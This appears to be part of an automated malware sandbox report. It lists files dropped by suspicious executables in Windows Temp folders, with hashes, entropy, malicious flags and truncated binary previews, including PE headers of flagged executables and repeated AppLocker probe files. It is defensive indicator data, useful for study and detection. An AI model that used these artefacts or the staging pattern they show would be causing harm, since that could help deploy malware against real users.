                                                                                                                                                                                                                                                Preview:..({.....65."...f....k%. +......v.Y.H2....A;U...'.s....3..R_H......QG...&XKw.,.f.MB....6.&tI.G*...J..V.P*... ..]....R.l.N...r.+da..h...d.*..^.t...?K....cR....z...h0...8.sEt...i.h|.c......F..LA.Y9.T.]_..!u...[e.#(.pN.t.0z..[U....N......K7.<..X..%..H..*w.C.E."...|....3...'..2.wi....?i..\(..8F. .s.T..#6...B.Hq..^..&XSgE.w.g....A0.<..w@.....M......r.M{......KP.V]...?......Qh...!....1..z .".*$J..xCB^.T..7.....,....g^.tXs.f...gz%..........5o.."x..2.....Q.g.`=..1..A.. .....L.B.....H.....q.B.<.o."u.ud.7.....y\.....d.Eil.".,.cw..m...Ax!.]R...I..}...<.L*...tj...._N.(..p...+v..3.....O..'V..).......L9M....sY...._..@..|.&UC.!.J..*Fp..).Nc.......\.......O.Ge.t.x...};.U.x.|.R...._.3....2,,+..~..)d.h..?....b....@..5....3....x.b.W{.wB.......i.g..N./..Aq.y....k.9w.g.yx.l2.Y;h..`J..x.XT....80.F.......!.....?90.$.....[.....+'{W.D@.]."[.r.j_...BW.f/.re.*.hpe......U.....V4].X_.=..r.S.Du]Ak.a....@...AAj.B...}.|:.`..-H=.......|.q.tP..h.....g.8b}z4.G8^.<N...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):55296
                                                                                                                                                                                                                                                Entropy (8bit):6.654459170489211
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:XaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVml:XtNPnj0nEoXnml
                                                                                                                                                                                                                                                MD5:35469FF6842A57BD9788DB58A1E1C0CC
                                                                                                                                                                                                                                                SHA1:47B76F8AE04AEFF8CDE18E15A6AB9D072214A54A
                                                                                                                                                                                                                                                SHA-256:7006A277A8B2AB82AE4409DF94E227083287B7678B9FFE79E2E19D534F1335EC
                                                                                                                                                                                                                                                SHA-512:3B97531E8D41C069DD9A8A6F3FE0FBC498FACBB6DF823525A726499CF5A4EA40879B7D02138C6D020520DF2D59C28EFC2F51470BF9AAC9F00B6F40101FE51AD0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.....~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}............F..4F......F.f.............f;.u...F.....f;.t....:3.....u..u..U....u..u..9........t.G..F..4F...f;.t....8.......5..F..4F...f;.t..........1L..4F..F..4F...f;.t......jw[...3.B....1L...F.......;u.............I.^.E.#.E.\.A...............F.jwYf9.F..x.......f.~....h....E..GP..\....}..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                Entropy (8bit):6.555933383144663
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:65fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubT:ufhnueoMmOqDoioO5bLezW9FfTun
                                                                                                                                                                                                                                                MD5:04DF53FD74B69C92DBA8CD83EAFA1180
                                                                                                                                                                                                                                                SHA1:275765D9C7E3300C0B7579AE3DE32F658E12945C
                                                                                                                                                                                                                                                SHA-256:DB246122E92D7C13AE1050C65C1E1F722F4E98375C9875D719F775CFE1478EE9
                                                                                                                                                                                                                                                SHA-512:44DFA1CCF0C3B054DAC3FADBA5A87C7C56F318C74DFF83810310E349B80029F19A08133C502DD7B65E543B882E567AC19DE54F8A520FF073774894F6F8320EF5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..@...Pjr...........9\$Dt......P....D$...@.Ph........3......B..\$0j.....D$4.\$<PW.u..D$L..........x .E....@....f.x..t...@...Pjr.p....L$0.&q......P....D$....f..A.......t$@.L$d.=...D$...P.D$$P.D$hP.u.S.;......L$`.....G....tp....Rt[...t9...t$...t..L$..D$0P....-.t$..L$4..H...:.L$..D$0P.......L$..D$0P.9H...t$..L$4.>.....t$..L$4..N...D$0P.L$$.....t$@.L$d..<...D$ ..P.D$dP.u.......L$`..."G...L$0.!p...Q.t$@.L$d.<...D$...P.D$$P.D$hP.u..t$ .J......L$`.....F...........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):53248
                                                                                                                                                                                                                                                Entropy (8bit):6.721434698149147
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:4Mf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04VQv7Qf0VosQE7YmFdno:Dh+I+FrbCyI7P4Cxi8q0vQEcmFdno
                                                                                                                                                                                                                                                MD5:7847E23CCE3770257DD905024CDC5020
                                                                                                                                                                                                                                                SHA1:2D2070CB134CCDE38544814A1E1E35A08AB95EA6
                                                                                                                                                                                                                                                SHA-256:75F0206860B962D3636015D98C420EC5EBF4023CA7B75B747AEB388AAFE9049A
                                                                                                                                                                                                                                                SHA-512:97F5B6924C23343F732AB470B8006EF2B25C92FADB3560FD56DB6E53B8DAF0C65CE66EB416BD03126C3B1AE6FA2CF66178A487C0EABAD24263A3DE7253C236B0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:Y;.t..u.S.3..Y;.u.W.....Y..u..u..7...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..~{..Y.M....I....u!...........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u..$...Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..hz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.h..L....3..u.E..0....Y.u..E....8........?k.0.....M..D.(.t!W.....YP....I...u.........0.I.................u..E.............\.......u.M..1.....Y..U.....E..M..E..E.E.P.u..E.P.D.....]..U..QV.u..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):315803136
                                                                                                                                                                                                                                                Entropy (8bit):0.05424084145137839
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:PiF1SBe/VehmyxlQ6H3Gqzu8W5yvfwWen35+f+eVNcwan3llVE:vbWUgWenIftV+w8llVE
                                                                                                                                                                                                                                                MD5:FCF2600609013C43C081412CDEA7BB5A
                                                                                                                                                                                                                                                SHA1:36350F31DAE5860E581890B95D51C57A33C9BC9D
                                                                                                                                                                                                                                                SHA-256:9E90381883AE0254D0531DCC11B3DF43D109C34C7EFFBCBE10BD836B250BB531
                                                                                                                                                                                                                                                SHA-512:82F7893186917722988567C093F39B568DE9CA4AD986557079E3F3AF3E6FB625DE9F9DAA114FCDD82E2B62BB8A54F88AAF6249C62AA4D1339479E6AD6874F95F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.cg...........#...(...........................f.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......|...J..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):95232
                                                                                                                                                                                                                                                Entropy (8bit):4.612003853136968
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D9EBAE5A1B2F513852F89FDC3D31672D
                                                                                                                                                                                                                                                SHA1:DFA418E6FD3C5B16B685EA0E09CC159A5FF6ED14
                                                                                                                                                                                                                                                SHA-256:B9A3C8E95D261CC9C6B28B58518554120AA2CFA09C2BE81C609C0F01B26B313D
                                                                                                                                                                                                                                                SHA-512:D5A9226EA1152566872669C4072BEA6498C930E405DB45FB6B7B63CD7A807BE814C7A71E983851F5D7A66B131319A850DDB10E1D4661D4CACD3082CB5C1CAEAC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.........................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.................................(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41523
                                                                                                                                                                                                                                                Entropy (8bit):7.995572172924696
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:6F1A940A0159306F679FF4D03524AE0B
                                                                                                                                                                                                                                                SHA1:2B48523D0BF3828ABD8590E13A03B5946B3D442D
                                                                                                                                                                                                                                                SHA-256:7E294DD8F93A9A7D79FB118070F548D1E8FDA62FA96AF973E1A950F150B0331E
                                                                                                                                                                                                                                                SHA-512:4DDF0AFA24B981BAC3CA60CB52AF73E39BF7155972F49968C8FC85A17F561208D76158CD117948467176696A0BA87B9AC33658C5E7EF1EF3D4201139E959F932
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...._..*...b@}.+....G.Qb._.._A...Q....u.V.^..-y.R...bP{..1..c_%..%.wt.oCbD.z.2.r'.-......V...h..g9S...e..K.ozJ6.d........F<;I.<nv.r..-.W.*s"q.>A.`. ....]Q&[...B.......b(...... .7...{..,m1.%...I.%...&... .........&[.67*.+..&..@.LV......B.C..W..2.y...Ji.L1..DY.h..6..z.B..n..K.A..P....1+J%..~.)....Q.M4.s.$..\X6..O...,_...V.7..O../........~.$yV(-.@...^.6..../.A.q..L.mN...B....S.NO...j.....iN.8........`...}.a.4..#>.....-..j\3.E0...6~...N*...0.......T......c.c.5..H...@].Ax..P@...W=T.2(w_.......iRO'.wF......@L.)......T....Dp..z9.s......w .....^........o...*n.W.a.V.^o.=..G..q..2.g<5....C.... .......S...BM."..MzHK...v.Z*..H.........v?IT..f1.N.ts.....dIQ=.[..dWg.4OR;.h.x.P.i......Cj...@W.zg...L,...y.f25D...}M..5.]..NB!8.9..L*;..AT..z..?....)z.....Z....oA.WM.(..H.J......|.4..2. ...9...e..g..z...[..2]-a.N,@..;......3...I$..#.9..Z9...<..[X...'m....>.../.....WPe.@.._...=P........|`R...`..a.)...I(J.R......z. .......1B7..d.=..jy.q`&..4n..
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3032576
                                                                                                                                                                                                                                                Entropy (8bit):6.531591038682421
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:C9624E4E0C6BBC83B57F844D1DC44102
                                                                                                                                                                                                                                                SHA1:B0F8C247986305F8F1F83EA55BB04F6C748557CE
                                                                                                                                                                                                                                                SHA-256:A7A661CF43D7129A809901C641998089AFF10F97A09BBDF5874BA16C01DB5DFB
                                                                                                                                                                                                                                                SHA-512:0417B2186A7F284A79016BD2CC473768293F2C262400439DAC659B0A46CFF82F72018F6FBBB3BA41B6D76EEFF1F96110F8CD5C4739989DAFB17942DD0E9A0D23
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2...........@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...hjveylar.0+......,+.................@...feaxxngf......1...... ..............@....taggant.0....1.."...$..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
